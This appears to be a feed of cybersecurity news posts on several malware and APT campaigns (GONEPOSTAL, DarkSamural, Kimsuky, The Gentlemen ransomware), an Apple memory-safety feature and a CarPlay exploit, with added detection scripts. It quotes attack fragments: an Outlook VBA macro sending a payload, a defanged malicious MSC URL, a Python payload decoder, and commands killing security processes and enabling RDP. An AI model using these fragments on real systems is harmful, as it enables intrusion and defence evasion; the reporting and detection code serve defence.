• In recent weeks, security teams have observed a sophisticated new strain of malware—dubbed GONEPOSTAL—that subverts Microsoft Outlook to relay command and control (C2) instructions.

    Emerging through spear-phishing campaigns targeting corporate environments, GONEPOSTAL disguises itself as a benign Office document.

    Upon opening the weaponized attachment, victims unknowingly activate a multi-stage payload that interfaces directly with Outlook’s COM APIs to send and receive encrypted email messages containing C2 data.

    Early indicators suggest the threat actor behind GONEPOSTAL aims to maintain stealth by hiding network traffic within legitimate email flows, undermining traditional perimeter-based defenses.

    Kroll analysts noted that the initial compromise vectors rely on social engineering tactics that exploit common workplace behaviors.

    The malicious document leverages a heavily obfuscated VBA macro to drop a lightweight launcher executable into the user’s temporary folder.

    Once invoked, the launcher dynamically loads additional modules from a remote server, blending in with routine Outlook operations.

    These secondary modules parse the victim’s address book to identify likely internal targets for lateral movement, then craft outbound emails with base64-encoded control instructions embedded in image attachments.

    Kroll researchers identified that this tactic effectively bypasses most email gateway appliances, as the attachments appear as innocuous company logos or promotional flyers.

    In its third phase, GONEPOSTAL establishes persistence by creating a registry entry under HKCU\Software\Microsoft\Windows\CurrentVersion\Run, referencing a benign-looking Word document named “Company_Update.docx.”

    This document contains a hidden OLE object that, when opened by the victim via Outlook preview, re-executes the payload without raising any security prompts.

    Further, the malware writes a DLL into the AppData\Roaming\Microsoft\Outlook directory and registers it with Outlook’s add-ins framework, ensuring that every instance of Outlook automatically loads the malicious component on startup.

    Victims typically remain unaware of the threat's presence, as the add-in manifests under the innocuous name “OfficeUpdate.”
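    As an added example (not Kroll's or the article's code), the following Python triage helper looks for the persistence artefacts just described in a constructed HKCU registry export and a constructed listing of the roaming Outlook folder; the add-in ProgID OfficeUpdate.Connect, the file paths and the allowlist parameter are assumptions.

```python
# Added triage helper (not Kroll's or the article's code) for the GONEPOSTAL
# persistence artefacts described above. Input is a constructed `reg export`
# of HKCU plus a constructed listing of %AppData%\Roaming\Microsoft\Outlook;
# the add-in ProgID, paths and file names below are made-up stand-ins.
DOCUMENT_EXTS = (".docx", ".doc", ".docm", ".rtf")
RUN_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"
ADDINS_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\Addins"


def parse_reg_export(text):
    """Parse a .reg export into {key: {value_name: data}}; string data is unescaped."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
        elif current is not None and "=" in line:
            name, _, data = line.partition("=")
            name = name.strip().strip('"')
            if data.startswith('"') and data.endswith('"'):
                data = data[1:-1].replace("\\\\", "\\").replace('\\"', '"')
            keys[current][name] = data
    return keys


def launched_file(command):
    """Strip quotes and arguments from a Run value to get the file it launches."""
    command = command.strip()
    if command.startswith('"'):
        return command[1:].split('"', 1)[0]
    return command.split(" ", 1)[0]


def triage_run_key(keys):
    """Run entries that open a document or start something from the temp folder."""
    findings = []
    for name, data in keys.get(RUN_KEY, {}).items():
        target = launched_file(data).lower()
        if target.endswith(DOCUMENT_EXTS):
            findings.append(f"Run value '{name}' launches a document: {target}")
        if "\\appdata\\local\\temp\\" in target:
            findings.append(f"Run value '{name}' runs from the temp folder: {target}")
    return findings


def triage_outlook_addins(keys, expected=frozenset()):
    """COM add-ins set to load at startup (LoadBehavior 3) that are not on the allowlist."""
    findings, prefix = [], ADDINS_KEY.lower() + "\\"
    for key, values in keys.items():
        if not key.lower().startswith(prefix):
            continue
        progid = key[len(prefix):]
        if values.get("LoadBehavior", "").lower() == "dword:00000003" and progid not in expected:
            friendly = values.get("FriendlyName", "?")
            findings.append(f"Unexpected Outlook add-in loads at startup: {progid} ({friendly})")
    return findings


def triage_outlook_folder(listing):
    """The roaming Outlook folder holds profile data, never code: any DLL there is a finding."""
    return [f"DLL in Outlook roaming folder: {n}" for n in listing if n.lower().endswith(".dll")]


# Constructed sample data: one benign Run entry, one document-launching entry,
# one startup add-in and one DLL sitting in the Outlook profile folder.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"CorpUpdate"="C:\\Users\\alice\\Documents\\Company_Update.docx"

[HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\Addins\OfficeUpdate.Connect]
"FriendlyName"="OfficeUpdate"
"LoadBehavior"=dword:00000003
'''
SAMPLE_LISTING = ["Outlook.srs", "alice@corp.example.nk2", "OfficeUpdate.dll"]


def run_triage(reg_text=SAMPLE_REG, listing=SAMPLE_LISTING, expected=frozenset()):
    """Run all three checks and return the combined list of findings."""
    keys = parse_reg_export(reg_text)
    return (triage_run_key(keys) + triage_outlook_addins(keys, expected)
            + triage_outlook_folder(listing))
```

Passing the organisation's known add-in ProgIDs as `expected` suppresses the add-in finding for approved software while the Run-key and DLL checks still fire.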

    The impact of GONEPOSTAL has been significant. Multiple mid-sized enterprises in North America have reported unexplained outbound email traffic spikes, matched by credential theft and unauthorized file transfers.

    Security teams investigating anomalous SMTP sessions uncovered encrypted JSON blobs masquerading as inline images, which—after decryption—revealed system reconnaissance data and remote shell commands.

    This dynamic C2 channel enables the adversaries to query registry keys, manipulate files, and pivot to domain controllers, all while evading standard detection signatures.

    Infection Mechanism

    A closer examination of GONEPOSTAL’s infection mechanism reveals the campaign’s reliance on a cleverly crafted VBA macro embedded within a booby-trapped document.

    Flowchart of execution (Source – Kroll)

    The macro code, heavily obfuscated to conceal its true purpose, begins by declaring Outlook COM object references (the recipientAddress and payloadPath variables are assigned earlier in the macro and are not shown here):

    Dim OutlookApp As Object
    Set OutlookApp = CreateObject("Outlook.Application")   ' late-bound Outlook COM automation
    Dim MailItem As Object
    Set MailItem = OutlookApp.CreateItem(0)                 ' 0 = olMailItem
    MailItem.To = recipientAddress
    MailItem.Subject = "Monthly Report"
    MailItem.Attachments.Add payloadPath
    MailItem.Send                                           ' dispatch the message

    Once executed, this snippet not only dispatches the initial payload but also schedules follow-up tasks via the Windows Task Scheduler, ensuring that Outlook remains the primary conduit for ongoing command orchestration.

    By leveraging native Windows and Office components, GONEPOSTAL sidesteps external dependencies, making it especially challenging to pinpoint through conventional network monitoring tools.

    The infection chain culminates with the installation of a stealthy Outlook add-in, allowing the attacker to harvest sent and received emails, covertly modify message content, and issue new C2 commands without user awareness.

    This modular design demonstrates a high degree of operational maturity, indicating that the threat actor is well-versed in blending malicious activity into everyday user workflows.

    The post New GONEPOSTAL Malware Hijacking Outlook to Enable Command and Control Communication appeared first on Cyber Security News.


  • Apple has announced that the upcoming iPhone 17 and iPhone Air will feature a groundbreaking security capability called Memory Integrity Enforcement (MIE), designed to thwart sophisticated mercenary spyware attacks.

    This new feature, the result of a five-year engineering initiative, integrates Apple silicon hardware with advanced operating system security to provide what the company calls “industry-first, always-on memory safety protection” without impacting device performance.

    While the average iPhone user has not been subject to successful, widespread malware attacks, a more insidious threat exists in the form of mercenary spyware.

    These highly complex attacks are often associated with state actors and involve exploit chains that can cost millions of dollars to develop. They are used to target a very small number of specific individuals, such as journalists, activists, and government officials.

    A common link in these attacks, whether on iOS, Android, or Windows, is the exploitation of memory safety vulnerabilities. Apple’s MIE is a direct response to this threat, aiming to make such exploits significantly more difficult and expensive to carry out.

    This effort is part of a broader strategy at Apple to enhance memory safety, which also includes the development of memory-safe programming languages like Swift and the introduction of secure memory allocators in previous iOS versions.

    How MIE Provides Protection

    Memory Integrity Enforcement is built upon several layers of technology. It starts with Apple’s secure memory allocators, which organize memory based on its intended purpose, making it harder for attackers to corrupt.

    The core of MIE, however, is the use of the Enhanced Memory Tagging Extension (EMTE), a feature developed in collaboration with Arm, which is supported by the new A19 and A19 Pro chips.

    EMTE works by assigning a “tag” to each piece of memory. When a program tries to access that memory, the hardware checks if it has the correct tag.

    If the tags do not match, which can happen during a buffer overflow or use-after-free attack, the hardware immediately blocks the access and terminates the process.

    Memory Integrity Enforcement

    Apple’s implementation is strictly synchronous, meaning it checks for memory corruption in real-time, leaving no window for attackers to exploit.

    To protect against even the most advanced threats, MIE also includes Tag Confidentiality Enforcement to guard against side-channel and speculative-execution attacks that could reveal memory tags.

    Apple’s offensive research team spent five years, from 2020 to 2025, continuously attacking MIE prototypes to identify and eliminate potential weaknesses before the feature’s public release.

    The company’s evaluation, which tested MIE against real-world exploit chains used in previous attacks, concluded that the new protection fundamentally disrupts attackers’ strategies.

    The research showed that MIE blocks attacks so early in the process that it was not possible to rebuild the exploit chains by simply swapping in different vulnerabilities.

    With the launch of MIE, Apple aims to make this powerful protection available to third-party app developers through Xcode’s “Enhanced Security” settings.

    By making it immensely more expensive and difficult to develop and maintain memory corruption-based spyware, Apple believes Memory Integrity Enforcement represents one of the most significant upgrades to memory safety in the history of consumer operating systems.

    The post Apple iPhone 17 With New Memory Integrity Enforcement Feature to Block Mercenary Spyware Attacks appeared first on Cyber Security News.


  • Security researchers have observed a sophisticated campaign in recent weeks targeting critical infrastructure and government entities across South Asia.

    Dubbed the DarkSamural operation, this attack chain leverages deceptively crafted LNK and PDF files to infiltrate networks, establish persistence, and exfiltrate sensitive information.

    Initial reconnaissance indicates that the adversaries disguise malicious MSC (Microsoft Management Console) files with familiar PDF icons, enticing recipients to inadvertently launch embedded scripts.

    As the campaign unfolds, stolen credentials and system metadata flow back to the attackers’ command-and-control servers, enabling further lateral movement.

    The infection begins with a spear-phishing email containing a compressed archive. Recipients are presented with a file named Drone_Information.pdf[.]msc, which, despite its PDF-like appearance, executes when double-clicked.

    Ctfiot analysts noted that these MSC files employ the GrimResource technique to unpack and run obfuscated JavaScript, which in turn downloads a second-stage payload.

    This multi-layered approach impedes signature-based detection, as each stage appears benign until deobfuscation occurs.

    Researchers identified that the malicious script contacts a remote URL and retrieves a disguised DLL, eventually stored under C:\ProgramData\DismCore[.]dll for subsequent execution.

    DarkSamural’s impact extends well beyond initial access.

    Victims have reported unauthorized file transfers, browser credential theft, and even remote shell access.

    The combination of open-source and proprietary RATs—including Mythic, QuasarRat, and BADNEWS—grants the attackers versatile control over compromised machines.

    Unit 942 Drone Info MAK3 (Source – Ctfiot)

    Files harvested range from administrative documents to proprietary research, underscoring the campaign’s strategic focus on exfiltrating high-value targets.

    Further analysis reveals that the malicious DLL embeds an export function, DllRegisterServer, which dynamically resolves critical Windows APIs.

    Upon execution, the sample gathers host details such as machine name, user account, and process ID, packaging them into a JSON check-in packet.

    This packet is encrypted with AES-128-GCM and transmitted to the C2 endpoint over WinHTTP. The resulting network artifacts mimic legitimate update traffic, complicating anomaly detection.

    Infection Mechanism and Obfuscation

    A closer examination of the MSC file’s internal structure uncovers a multi-layered obfuscation scheme designed to thwart reverse engineering.

    The initial JavaScript code, embedded in an XML StringTable, triggers an XSL transformation that launches mmc[.]exe with a remote script reference.

    Phishing file (Source – Ctfiot)

    <StringTable>
      <GUID>{71E5B33E-1064-11D2-808F-0000F875A9CE}</GUID>
      <Strings>
        <String ID="14">https[:]//caapakistaan[.]com/.../Unit-942-Drone-Info-MAK3[.]html</String>
      </Strings>
    </StringTable>

    After fetching the second layer, the script reverses the character sequence, undoes the token substitutions, decodes the resulting hexadecimal string, and Base64-decodes the output to produce the final DLL.

    The decoding routine exemplifies this transformation in Python:

    import base64

    def decode(obfuscated):
        # Layer 1: the payload is stored back-to-front, so reverse it.
        b = list(obfuscated)
        # Layer 2: undo the token substitutions ("$" stood for "4", "!" for "1").
        c = ''.join(b[::-1]).replace("$", "4").replace("!", "1")
        # Layer 3: the result is a hex string; turn each byte pair back into a character.
        d = ''.join([chr(int(c[i:i+2], 16)) for i in range(0, len(c), 2)])
        # Layer 4: the hex-decoded text is Base64; decoding it yields the DLL bytes.
        return base64.b64decode(d)

    Subsequently, the decoded bytes are written to disk and registered as a COM server, ensuring execution on system startup.

    This layered obfuscation, combined with scheduled task creation, illustrates DarkSamural’s meticulous approach to infection and evasion.

    Cybersecurity teams should inspect MSC file behavior, monitor anomalous mmc[.]exe invocations, and validate script-based downloads against known artifact hashes to detect and disrupt this campaign.
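    An added detection example (not Ctfiot's or the article's code) for the guidance above: it extracts URLs from the StringTable of a constructed .msc file and checks constructed process-creation events for mmc.exe opening a console from a user-writable path or under a double extension; the log format and the placeholder URL are assumptions.

```python
# Added example (not Ctfiot's or the article's code) for the MSC-based delivery
# described above. It pulls URLs out of a console file's StringTable and scans
# process-creation events for mmc.exe opening a console from a user-writable
# path or with a double extension. Sample file, URL and log lines are constructed.
import re
import xml.etree.ElementTree as ET

URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)
DOUBLE_EXT_RE = re.compile(r"\.(pdf|docx?|xlsx?|jpe?g|png)\.msc$", re.IGNORECASE)
USER_WRITABLE = ("\\downloads\\", "\\appdata\\local\\temp\\", "\\desktop\\", "\\users\\public\\")


def msc_string_table_urls(xml_text):
    """Return (string ID, URL) pairs for StringTable entries that contain a URL."""
    root = ET.fromstring(xml_text)
    hits = []
    for table in root.iter("StringTable"):
        for entry in table.iter("String"):
            for url in URL_RE.findall(entry.text or ""):
                hits.append((entry.get("ID"), url))
    return hits


def msc_is_suspicious(xml_text):
    """A saved console has no business referencing a remote URL, so any hit is a flag."""
    return bool(msc_string_table_urls(xml_text))


def triage_mmc_process_events(lines):
    """Flag mmc.exe loading a .msc from a user-writable path or with a double extension."""
    findings = []
    for line in lines:
        cmd = line.split("CommandLine=", 1)[1] if "CommandLine=" in line else line
        if "mmc.exe" not in cmd.lower():
            continue
        match = re.search(r'"?([^"\s]+\.msc)"?', cmd, re.IGNORECASE)
        target = match.group(1) if match else ""
        low = target.lower()
        if DOUBLE_EXT_RE.search(low):
            findings.append(f"double-extension console file: {target}")
        if any(p in low for p in USER_WRITABLE):
            findings.append(f"mmc.exe loading a console from a user-writable path: {target}")
    return findings


# Constructed .msc: the GUID is the one quoted above; the URL is a placeholder.
SAMPLE_MSC = """<?xml version="1.0"?>
<MMC_ConsoleFile ConsoleVersion="3.0">
  <StringTables>
    <StringTable>
      <GUID>{71E5B33E-1064-11D2-808F-0000F875A9CE}</GUID>
      <Strings>
        <String ID="1">Console Root</String>
        <String ID="14">https://example.invalid/Unit-942-Drone-Info-MAK3.html</String>
      </Strings>
    </StringTable>
  </StringTables>
</MMC_ConsoleFile>
"""

# Constructed process-creation events: a normal Event Viewer launch, the
# double-extension lure opened from Downloads, and an unrelated process.
SAMPLE_PROCESS_EVENTS = [
    'Image=C:\\Windows\\System32\\mmc.exe CommandLine="C:\\Windows\\System32\\mmc.exe" "C:\\Windows\\System32\\eventvwr.msc"',
    'Image=C:\\Windows\\System32\\mmc.exe CommandLine="C:\\Windows\\System32\\mmc.exe" "C:\\Users\\bob\\Downloads\\Drone_Information.pdf.msc"',
    'Image=C:\\Windows\\System32\\notepad.exe CommandLine=notepad.exe C:\\Users\\bob\\Downloads\\notes.txt',
]
```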

    The post DarkSamural APT Group Malicious LNK and PDF Files to Steal Critical Data appeared first on Cyber Security News.


  • CyberVolk ransomware, which first emerged in May 2024, has escalated its operations against government agencies, critical infrastructure, and scientific institutions across Japan, France, and the United Kingdom. Operating with pro-Russian leanings, CyberVolk specifically targets states perceived as hostile to Russian interests, leveraging sophisticated encryption techniques that render decryption impossible. This article delivers a technical analysis […]

    The post CyberVolk Ransomware Targets Windows Systems in Critical Infrastructure and Research Institutions appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • The North Korea-backed APT group Kimsuky has escalated its cyber operations by weaponizing GitHub repositories for malware delivery and data exfiltration, marking a sophisticated evolution in their attack methodology.

    This latest campaign demonstrates the group’s growing expertise in abusing legitimate cloud infrastructure to evade traditional security measures while maintaining persistent access to compromised systems.

    The attack chain begins with a malicious ZIP archive containing an LNK file disguised as an electronic tax invoice (전자세금계산서.pdf.lnk).

    When executed, this weaponized shortcut launches a PowerShell command that downloads and executes additional malicious scripts from attacker-controlled GitHub repositories.

    The initial payload establishes a foundation for systematic data collection and maintains long-term persistence on infected systems.

    S2W researchers identified nine private GitHub repositories associated with this campaign, including group_0717, group_0721, test, hometax, and group_0803.

    The threat actors embedded hardcoded GitHub Private Tokens directly within their PowerShell scripts to access these repositories, demonstrating careful operational security planning.

    Analysis of commit histories revealed the attacker’s email address (sahiwalsuzuki4[@]gmail.com) used during GitHub account creation.

    The malware’s persistence mechanism represents a particularly sophisticated approach to maintaining long-term access.

    Upon initial infection, the main.ps1 script creates a file named MicrosoftEdgeUpdate.ps1 under the %AppData% directory and establishes a scheduled task with the name “BitLocker MDM policy Refresh{DBHDFE12-496SDF-Q48D-SDEF-1865BCAD7E00}”.

    This task executes every 30 minutes after an initial 5-minute delay, creating an automated system for fetching and executing updated PowerShell scripts from the GitHub repository.

    Dynamic Script Management and Information Gathering

    The malware employs a dynamic script management system that timestamps infected systems and creates customized folders for data exfiltration.

    The PowerShell payload downloads a file named real.txt from the repository, replaces placeholder strings with timestamped values (ntxBill_{MMdd_HHmm}), and re-uploads the modified script using a time-specific filename format.

    This mechanism allows attackers to track individual infections and manage multiple compromised systems simultaneously.

    The information-stealing component collects comprehensive system metadata including IP addresses, boot times, operating system details, hardware specifications, device types, installation dates, and running processes.

    All collected data is compiled into log files and uploaded to the attacker’s repository under timestamped folders, creating an organized intelligence database for the threat actors.
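    As an added example (not S2W's or the article's code), the following Python helpers hunt for the two artefacts described above: a short-interval scheduled task running a PowerShell script under %AppData%, and a script that carries a hard-coded GitHub token and repository API calls; the task XML, the script text, the token value and the repository owner are constructed stand-ins.

```python
# Added hunting helpers (not S2W's or the article's code) for the persistence and
# GitHub abuse described above. One check parses a Task Scheduler XML export for a
# short-interval task running a PowerShell script under %AppData%; the other scans
# script text for hard-coded GitHub tokens and repository API calls. The task XML,
# script, token and repository owner are constructed stand-ins.
import re
import xml.etree.ElementTree as ET

# Classic personal access tokens start with ghp_, fine-grained ones with github_pat_.
GITHUB_TOKEN_RE = re.compile(r"\b(ghp_[A-Za-z0-9]{36}|github_pat_[A-Za-z0-9_]{22,})\b")
GITHUB_REPO_API_RE = re.compile(r"https://api\.github\.com/repos/[^\s\"']+", re.IGNORECASE)
ISO_DURATION_RE = re.compile(r"^PT(?:(\d+)H)?(?:(\d+)M)?$")


def parse_task_xml(xml_text):
    """Pull the command, its arguments and the repetition interval (minutes) from a task export."""
    info = {"command": "", "arguments": "", "interval_min": None}
    for el in ET.fromstring(xml_text).iter():
        tag = el.tag.rsplit("}", 1)[-1]          # drop the XML namespace prefix
        text = (el.text or "").strip()
        if tag == "Command":
            info["command"] = text
        elif tag == "Arguments":
            info["arguments"] = text
        elif tag == "Interval":
            m = ISO_DURATION_RE.match(text)
            if m:
                hours, minutes = m.groups()
                info["interval_min"] = int(hours or 0) * 60 + int(minutes or 0)
    return info


def task_is_suspicious(xml_text, max_interval_min=60):
    """PowerShell script in a user profile, re-run at most every max_interval_min minutes."""
    info = parse_task_xml(xml_text)
    cmdline = f"{info['command']} {info['arguments']}".lower()
    runs_powershell = "powershell" in cmdline or "pwsh" in cmdline
    script_in_appdata = "\\appdata\\" in cmdline and ".ps1" in cmdline
    interval = info["interval_min"]
    return runs_powershell and script_in_appdata and interval is not None and interval <= max_interval_min


def scan_script_for_github_abuse(script_text):
    """Return hard-coded tokens (truncated, never reported whole) and repo API endpoints."""
    tokens = [t[:8] + "..." for t in GITHUB_TOKEN_RE.findall(script_text)]
    return {"tokens": tokens, "endpoints": GITHUB_REPO_API_RE.findall(script_text)}


# Constructed task export modelled on the task name and cadence reported above.
SAMPLE_TASK_XML = r'''<?xml version="1.0"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\BitLocker MDM policy Refresh{DBHDFE12-496SDF-Q48D-SDEF-1865BCAD7E00}</URI></RegistrationInfo>
  <Triggers>
    <TimeTrigger>
      <Repetition><Interval>PT30M</Interval></Repetition>
      <StartBoundary>2025-08-03T10:05:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>powershell.exe</Command>
      <Arguments>-NoProfile -WindowStyle Hidden -File C:\Users\bob\AppData\Roaming\MicrosoftEdgeUpdate.ps1</Arguments>
    </Exec>
  </Actions>
</Task>
'''

# Constructed script fragment: a made-up token value and a made-up repository owner.
SAMPLE_SCRIPT = r'''
$token = "ghp_0123456789abcdefghijklmnopqrstuvwxyz"
$headers = @{ Authorization = "token $token" }
$url = "https://api.github.com/repos/example-org/group_0717/contents/real.txt"
Invoke-RestMethod -Uri $url -Headers $headers
'''
```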

    The post Kimsuky Hackers Via Weaponized LNK File Abuses GitHub for Malware Delivery appeared first on Cyber Security News.


  • At the recent DefCon security conference, researchers demonstrated a critical exploit chain that allows attackers to gain root access on vehicle infotainment systems by targeting Apple CarPlay.

    The multi-stage attack, named “Pwn My Ride,” leverages a series of vulnerabilities in the protocols that underpin wireless CarPlay, culminating in remote code execution on the car’s multimedia unit.

    The core of the exploit is CVE-2025-24132, a stack buffer overflow vulnerability within the AirPlay protocol SDK. Researchers from Oligo Security demonstrated how this flaw can be triggered once an attacker gains access to the vehicle’s Wi-Fi network.

    The vulnerability affects a wide range of devices that use AirPlay audio SDK versions before 2.7.1, AirPlay video SDK versions before 3.6.0.126, and specific versions of the CarPlay Communication Plug-in.

    By exploiting this buffer overflow, an attacker can execute arbitrary code with the highest level of system privileges, effectively taking control of the infotainment system.

    Exploiting the iAP2 Protocol

    The attack begins by targeting the initial connection process of wireless CarPlay. This process relies on two key protocols: iAP2 (iPod Accessory Protocol) over Bluetooth and AirPlay over Wi-Fi.

    The researchers discovered a fundamental authentication flaw within the iAP2 protocol. While the protocol ensures the car authenticates the phone, it fails to perform the reverse; the phone does not authenticate the car.

    This one-way authentication allows an attacker’s device to impersonate a legitimate iPhone.

    The attacker can then pair with the vehicle’s Bluetooth, often without a PIN code due to many systems defaulting to the insecure “Just Works” pairing mode.

    Once paired, the attacker exploits the iAP2 flaw to send a RequestAccessoryWiFiConfigurationInformation command, which tricks the system into revealing the vehicle’s Wi-Fi SSID and password.

    After obtaining the Wi-Fi credentials, the attacker connects to the car’s network and triggers CVE-2025-24132 to gain root access.

    This entire sequence can be a zero-click attack on many vehicles, requiring no interaction from the driver.

    Although Apple issued a patch for the vulnerable AirPlay SDK in April 2025, Oligo Security’s researchers noted that, to their knowledge, no car manufacturer has applied the fix.

    Unlike smartphones, which receive frequent over-the-air (OTA) updates, vehicle software update cycles are notoriously slow and fragmented.

    Many cars require a manual update at a dealership, and each automaker must independently test and validate the patched SDK for their specific hardware.

    This significant delay leaves millions of vehicles exposed to this vulnerability long after a fix has been made available, highlighting a critical gap in the automotive supply chain’s security posture.

    The post Apple CarPlay Exploited To Gain Root Access By Executing Remote Code appeared first on Cyber Security News.


  • GitLab has released critical security updates across multiple versions to address six significant vulnerabilities that could enable denial-of-service attacks, server-side request forgery, and information disclosure. The company released versions 18.3.2, 18.2.6, and 18.1.6 for both Community Edition and Enterprise Edition, with immediate upgrades strongly recommended for all self-managed installations. Critical Security Fixes Target Multiple Attack […]

    The post Multiple Vulnerabilities in GitLab Patched, Blocking DoS and SSRF Attack Vectors appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • Cybersecurity researchers have discovered two new malware families, including a modular Apple macOS backdoor called CHILLYHELL and a Go-based remote access trojan (RAT) named ZynorRAT that can target both Windows and Linux systems. According to an analysis from Jamf Threat Labs, ChillyHell is written in C++ and is developed for Intel architectures. CHILLYHELL is the name assigned to a malware


  • In recent months, security researchers have observed a surge in activity by a previously undocumented ransomware group known as The Gentlemen.

    This threat actor has rapidly distinguished itself through the deployment of highly specialized tools and meticulous reconnaissance tactics, targeting critical infrastructure across multiple sectors and regions.

    Leveraging legitimate Windows drivers and nuanced Group Policy Object (GPO) manipulation, The Gentlemen are capable of evading traditional defenses and achieving domain-wide compromise.

    The initial intrusion techniques of this group remain partially obscured; however, forensic evidence suggests that compromised credentials or exposed internet-facing services served as the primary infection vectors.

    Following foothold establishment, The Gentlemen deploy a dual-component defense evasion suite consisting of All.exe and ThrottleBlood.sys—a legitimate signed driver abused to terminate protected security processes.

    The Gentlemen ransomware group blog site (Source – Trend Micro)

    This kernel-level manipulation enables the threat actors to neutralize endpoint protections without triggering standard alerts.

    Trend Micro analysts noted that subsequent iterations of this suite include a dynamically modified binary, Allpatch2.exe, which specifically targets the unique security agent components present in the compromised network.

    By adapting their tools mid-campaign, the group has demonstrated both flexibility and a deep understanding of the enterprise security landscape.

    This approach has facilitated widespread deployment of their encryption payload via the NETLOGON share, ensuring rapid and comprehensive file encryption across domain-joined systems.

    The impact of The Gentlemen’s operations has been severe: key sectors such as manufacturing, healthcare, and construction have suffered service disruptions and extensive data encryption.

    Victims have reported loss of critical backups and unauthorized exfiltration of sensitive information via WinSCP, confirming the adoption of a double-extortion strategy.

    Victim distribution by industry, region, and country (as of August 2025) (Source – Trend Micro)

    Trend Micro’s attack-chain diagram illustrates each stage, from initial access through data exfiltration.

    Infection Mechanism and Kernel-Level Evasion

    A defining characteristic of The Gentlemen’s methodology is its exploitation of a legitimate Windows driver to achieve kernel-level execution.

    Upon execution, the ransomware drops a pair of files into the %USERPROFILE%\Downloads directory:

    copy All.exe %USERPROFILE%\Downloads\All.exe
    copy ThrottleBlood.sys %USERPROFILE%\Downloads\ThrottleBlood.sys

    The attacker then loads the driver and uses it to terminate targeted security services; the following command-line sequence illustrates this abuse of signed driver functionality:

    %USERPROFILE%\Downloads\All.exe install ThrottleBlood.sys
    taskkill /IM avagent.exe /F
    taskkill /IM VeeamNFSSvc.exe /F

    By leveraging this technique, The Gentlemen escape the limitations of user-mode bypasses.

    Once kernel execution is secured, the ransomware escalates privileges using PowerRun.exe, a legitimate utility frequently abused for elevated command execution.

    This allows the malware to modify critical registry keys—such as enabling RDP access via reg add HKLM\System\CurrentControlSet\Control\Terminal Server /v SecurityLayer /t REG_DWORD /d 1 /f—and deploy persistence mechanisms through GPO objects.
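    An added detection example (not Trend Micro's or the article's code) for the sequence above: it correlates constructed process-creation events so that a driver installed from a user-writable path followed by forced taskkill of backup or security processes raises an alert; the event format, the protected-process list and the five-minute window are assumptions.

```python
# Added detection routine (not Trend Micro's or the article's code) for the
# driver-abuse sequence described above. It walks constructed process-creation
# events and alerts when a .sys driver is installed from a user-writable path
# and, within a short window, the same user force-kills backup or security
# processes with taskkill. Event format, process list and window are assumptions.
import re
from datetime import datetime, timedelta

DRIVER_FILE_RE = re.compile(r"\b(\S+\.sys)\b", re.IGNORECASE)
TASKKILL_IMAGE_RE = re.compile(r"/im\s+(\S+)", re.IGNORECASE)
USER_WRITABLE = ("\\downloads\\", "\\appdata\\local\\temp\\", "\\users\\public\\")
# Backup and endpoint-protection images an intruder wants gone (assumed list;
# the first two are the ones named in the command sequence above).
PROTECTED_PROCESSES = {"avagent.exe", "veeamnfssvc.exe", "msmpeng.exe", "sense.exe"}
DEFAULT_WINDOW = timedelta(minutes=5)


def parse_event(line):
    """Constructed format: '<ISO-8601 time> <user> <command line>'."""
    stamp, user, cmd = line.split(" ", 2)
    return datetime.fromisoformat(stamp), user, cmd


def driver_installed_from_user_path(cmd):
    """Name of a .sys file referenced by a command running out of a user-writable directory."""
    match = DRIVER_FILE_RE.search(cmd)
    if match and any(p in cmd.lower() for p in USER_WRITABLE):
        return match.group(1)
    return None


def forced_kill_target(cmd):
    """Image name from 'taskkill ... /IM <image> ... /F' (either flag order), else None."""
    low = cmd.lower()
    if "taskkill" not in low or not re.search(r"/f\b", low):
        return None
    match = TASKKILL_IMAGE_RE.search(low)
    return match.group(1) if match else None


def detect_driver_abuse(lines, window=DEFAULT_WINDOW):
    """Pair each user-path driver install with protected-process kills that follow it."""
    events = [parse_event(line) for line in lines]   # assumed to be in time order
    alerts = []
    for i, (t_install, user, cmd) in enumerate(events):
        driver = driver_installed_from_user_path(cmd)
        if not driver:
            continue
        killed = []
        for t_kill, kill_user, kill_cmd in events[i + 1:]:
            if t_kill - t_install > window:
                break
            target = forced_kill_target(kill_cmd)
            if kill_user == user and target in PROTECTED_PROCESSES:
                killed.append(target)
        if killed:
            alerts.append({"user": user, "driver": driver, "killed": killed})
    return alerts


# Constructed events: the sequence quoted above, a benign forced kill by another
# user, and a legitimate driver install by an administrator.
SAMPLE_EVENTS = [
    "2025-08-10T02:14:05 CORP\\jdoe C:\\Users\\jdoe\\Downloads\\All.exe install ThrottleBlood.sys",
    "2025-08-10T02:14:09 CORP\\jdoe taskkill /IM avagent.exe /F",
    "2025-08-10T02:14:10 CORP\\jdoe taskkill /IM VeeamNFSSvc.exe /F",
    "2025-08-10T02:20:00 CORP\\svc_build taskkill /IM notepad.exe /F",
    "2025-08-10T03:00:00 CORP\\admin pnputil.exe /add-driver C:\\Drivers\\nic\\nic.inf /install",
]
```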

    The Gentlemen ransomware attack chain (Source – Trend Micro)

    The attack chain shows the code-driven stages of driver-based process termination; the combination of legitimate tools with custom binaries exemplifies a mature adversary who balances stealth, adaptability, and impact.

    As organizations struggle with conventional endpoint defenses, the emergence of such advanced tactics underscores the urgent need for proactive threat hunting and implementation of Zero Trust principles.

    The post New Gentlemen Ransomware Leverages Legitimate Drivers, Group Policies to Infiltrate Organizations appeared first on Cyber Security News.


  • Fileless malware has become a formidable adversary for security teams, operating entirely in memory and evading disk-based detection. A recent incident demonstrates how attackers leveraged a multi-stage fileless loader to deploy AsyncRAT, a powerful Remote Access Trojan (RAT), through legitimate system tools—leaving almost no footprint on disk. This case study highlights critical techniques for persistence, […]

